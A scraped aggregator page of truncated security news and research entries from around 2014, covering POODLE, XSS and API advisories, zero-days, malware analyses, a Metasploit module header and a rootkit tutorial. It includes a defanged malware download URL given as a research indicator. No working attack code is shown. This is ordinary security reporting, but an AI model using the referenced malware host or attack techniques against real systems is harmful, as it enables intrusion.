Clik here to view.
EBAY REFLECTED XSS
Earlier in the year, I discovered an XSS vulnerability in the Selling Manager section of the eBay.The problem was caused by improper escaping of the URL’s GET parameters, which were reflected back on...
View ArticleClik here to view.
Truly scary SSL 3.0 vuln to be revealed soon: sources
Gird your loins, sysadmins: The Register has learned that news of yet another major security vulnerability - this time in SSL 3.0 - is probably imminent.Maintainers have kept quiet about the...
View ArticleClik here to view.
How VPN Pivoting Works (with Source Code)
A VPN pivot is a virtual network interface that gives you layer-2 access to your target’s network. Rapid7’s Metasploit Pro was the first pen testing product with this feature. Core Impact has this...
View ArticleClik here to view.
two browser mem disclosure bugs (CVE-2014-1580 and CVE-something-or-other)
First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that causedFirefox prior to version 33 (released today) to leak bits ofuninitialized memory when rendering certain types of truncated imagesonto...
View ArticleClik here to view.
MindshaRE: Statically Extracting Malware C2s Using Capstone Engine
It’s been far too long since the last MindshaRE post, so I decided to share a technique I’ve been playing around with to pull C2 and other configuration information out of malware that does not store...
View ArticleClik here to view.
Two Limited, Targeted Attacks; Two New Zero-Days
The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel, with Microsoft...
View ArticleClik here to view.
BSRT-2014-008 Vulnerability in BlackBerry World service affects BlackBerry 10...
This advisory addresses a spoofing vulnerability that is not currently being exploited but affects BlackBerry 10 smartphone customers running the BlackBerry World app.more...
View ArticleClik here to view.
MSRT October 2014 – Hikiti
The October release of the Malicious Software Removal Tool (MSRT) is directly related to a Coordinated Malware Eradication (CME) initiative led by Novetta and with the help of many other security...
View ArticleClik here to view.
SE-2014-01] Breaking Oracle Database through Java exploits (details)
Oracle Oct 2014 CPU addresses 22 security issues affecting Java VMimplementation embedded in Oracle Database software.We have published details of the fixed issues and a description ofsome privilege...
View ArticleClik here to view.
One Doesn't Simply Analyze Moudoor
Today we are pleased to see an important milestone reached in a coordinated campaign against a sophisticated and well-resourced cyber espionage group. We have recently been participating in a...
View ArticleClik here to view.
Analysis of the Linux backdoor used in freenode IRC network compromise
freenode is a large IRC network providing services to Free and Open Source Software communities, and in September the freenode staff team blogged about a potential compromise of an IRC server. NCC...
View ArticleClik here to view.
Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities
Document Title:===============Indeed Job Search 2.5 iOS API - Multiple VulnerabilitiesReferences (Source):====================http://www.vulnerability-lab.com/get_content.php?id=1303Release...
View ArticleClik here to view.
Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML Vulnerability
Document Title:===============Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML VulnerabilityReferences...
View ArticleClik here to view.
PayPal Inc BB #98 MOS - Persistent Settings Vulnerability
Document Title:===============PayPal Inc BB #98 MOS - Persistent Settings VulnerabilityReferences (Source):====================http://www.vulnerability-lab.com/get_content.php?id=983Release...
View ArticleClik here to view.
Metasploit: Microsoft Bluetooth Personal Area Networking (BthPan.sys)...
### This module requires Metasploit: http//metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'require...
View ArticleClik here to view.
Gameover Zeus Accessorizes at Vogue.com
Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp://media.vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exemore...
View ArticleClik here to view.
Attack of the week: POODLE
Believe it or not, there's a new attack on SSL. Yes, I know you're thunderstruck. Let's get a few things out of the way quickly.First, this is not another Heartbleed. It's bad, but it's not going to...
View ArticleClik here to view.
Gmail’s SMTPUTF8 prone to homographic attacks (thanks, 4chan!)
I always loved working with Google.I have been participating in their program since 2012. Over the years, I addressed some nice vulnerabilities that got me a couple of hall of fame entries and of...
View ArticleClik here to view.
POODLE attacks on SSLv3
My colleague, Bodo Möller, in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers), just posted details about a padding oracle attack against CBC-mode ciphers in SSLv3. This attack,...
View ArticleClik here to view.
Userland rootkits: Part 1, IAT hooks
This is the first part of this series about Userland rootkits, I wanted to write on it and demonstrate how some rootkits do to hide files by using IAT hooks.This post is about a classic trick, known...
View Article